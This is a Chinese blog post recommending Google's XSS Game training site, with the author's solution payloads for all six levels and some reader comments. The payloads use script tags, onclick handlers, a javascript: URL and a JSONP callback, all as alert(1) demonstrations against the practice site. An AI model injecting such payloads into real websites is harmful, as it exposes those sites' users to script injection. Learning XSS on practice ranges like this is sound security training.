XSS GAME ,非常基礎的 XSS 練功房

3 / 26, 2015 推薦網站 , 網路安全

以往玩 XSS 入門幾乎都是在 alert(1) to win ,但是不得不說 alert(1) to win 的題目其實對初學者挺難的,現在有個由 Google 製作的 XSS Game ,基本上超級簡單的,很適合拿來入門學習用,而且也有一步一步的提示去引導。

https://xss-game.appspot.com/

基本上一進去,按下 Let me at ’em! 就可以玩了
xss-game-1

“Target code” 是這網站的原始碼,請從原始碼找注入點,”Hints” 就是提示,會逐步顯示,通常最後一個提示就是答案了,建議不要去看,除非真的沒梗惹
xss-game-2

解最後還有一個蛋糕喔XD
xss-game-3

======以下為解答======
小弟蒐集了自己的解法,不一定是最佳解,但是可以參考參考

第一關:在搜尋框放入 <script>alert(1)</script>
第二關:新增留言 <span onclick=”alert(1)”>test</span> ,然後點一下剛剛新增的 “test”
第三關:把網址改成 https://xss-game.appspot.com/level3/frame#1′ onclick=’alert(1)’  ‘ ,然後點一下那個無法顯示的圖片
第四關:在輸入框中放入 3’);alert(1);//
第五關:把網址改成 https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
第六關:把網址改成 https://xss-game.appspot.com/level6/frame#Https://www.google.com/jsapi?callback=alert

  • Wong Yung Keung

    路過的小新手

  • ZHOU

    楼主你好,我是xss新手,请问xss game第二题是怎么过滤标签的?看了两边网页源码也没找到过滤机制。

    • s3131212

      既然 script 不能用了,可以試試看把事件掛上去
      <span onclick="alert(1)">123</span>
      然後去點一下剛剛發出去的留言的文字,也就是 123 ,就可以通過了

    • s3131212

      喔抱歉看錯留言訊息,其實我也不是很確定,應該是因為 localStorage 的緣故吧

  • 樓主好黑

  • petjelinux

    第一次來看這網站
    只會Java阿R

    • s3131212

      歡迎光臨~

  • 海豹

    嗚嗚嗚 好難

    • s3131212

      少在那邊裝白白了